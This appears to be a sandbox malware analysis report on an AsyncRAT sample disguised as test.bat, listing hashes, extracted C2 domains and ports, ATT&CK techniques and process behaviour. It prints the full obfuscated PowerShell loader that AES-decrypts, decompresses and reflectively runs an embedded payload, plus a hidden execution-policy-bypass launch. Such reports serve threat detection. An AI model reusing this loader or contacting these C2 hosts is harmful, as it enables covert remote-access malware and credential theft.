asyncrat | 037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c

General

Target

test.bat
Size

48KB
MD5

106c27af68b78b8670267a5eebfc8040
SHA1

a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
SHA256

037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
SHA512

7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
SSDEEP

768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ

Score

10^/10

asyncrat default rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

mikludoykxx.ddns.net:6606

mikludoykxx.ddns.net:7707

mikludoykxx.ddns.net:8808

mikeludomax.ddns.net:6606

mikeludomax.ddns.net:7707

mikeludomax.ddns.net:8808

mikeludoyyxx.ddns.net:6606

mikeludoyyxx.ddns.net:7707

mikeludoyyxx.ddns.net:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4688-141-0x0000018FCA550000-0x0000018FCA562000-memory.dmp	asyncrat
behavioral1/memory/4688-146-0x0000018FCB0B0000-0x0000018FCB0D2000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

Processes:

test.bat.exe

pid process

4688 test.bat.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

test.bat.exe

pid process

4688 test.bat.exe
4688 test.bat.exe
4688 test.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

test.bat.exe

description pid process

Token: SeDebugPrivilege 4688 test.bat.exe

pid	process
4688	test.bat.exe

pid	process
4688	test.bat.exe
4688	test.bat.exe
4688	test.bat.exe

description	pid	process
Token: SeDebugPrivilege	4688	test.bat.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exetest.bat.execmd.exe

description	pid	process	target process
PID 1660 wrote to memory of 4688	1660	cmd.exe	test.bat.exe
PID 1660 wrote to memory of 4688	1660	cmd.exe	test.bat.exe
PID 4688 wrote to memory of 4964	4688	test.bat.exe	cmd.exe
PID 4688 wrote to memory of 4964	4688	test.bat.exe	cmd.exe
PID 4964 wrote to memory of 2780	4964	cmd.exe	powershell.exe
PID 4964 wrote to memory of 2780	4964	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Users\Admin\AppData\Local\Temp\test.bat.exe
"test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"'
4⤵
PID:2780

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/2780-154-0x0000000000000000-mapping.dmp

Download
memory/4688-141-0x0000018FCA550000-0x0000018FCA562000-memory.dmp

Filesize
72KB

Download
memory/4688-139-0x0000018FCA540000-0x0000018FCA54E000-memory.dmp

Filesize
56KB

Download
memory/4688-132-0x0000018FCA5A0000-0x0000018FCA616000-memory.dmp

Filesize
472KB

Download
memory/4688-120-0x0000000000000000-mapping.dmp

Download
memory/4688-146-0x0000018FCB0B0000-0x0000018FCB0D2000-memory.dmp

Filesize
136KB

Download
memory/4688-147-0x0000018FCB0F0000-0x0000018FCB10E000-memory.dmp

Filesize
120KB

Download
memory/4688-127-0x0000018FCA3F0000-0x0000018FCA412000-memory.dmp

Filesize
136KB

Download
memory/4688-155-0x0000018FCB250000-0x0000018FCB2CE000-memory.dmp

Filesize
504KB

Download
memory/4688-165-0x0000018FCA570000-0x0000018FCA57A000-memory.dmp

Filesize
40KB

Download
memory/4688-172-0x0000018FCB2D0000-0x0000018FCB330000-memory.dmp

Filesize
384KB

Download
memory/4688-179-0x0000018FCB330000-0x0000018FCB3C0000-memory.dmp

Filesize
576KB

Download
memory/4964-153-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing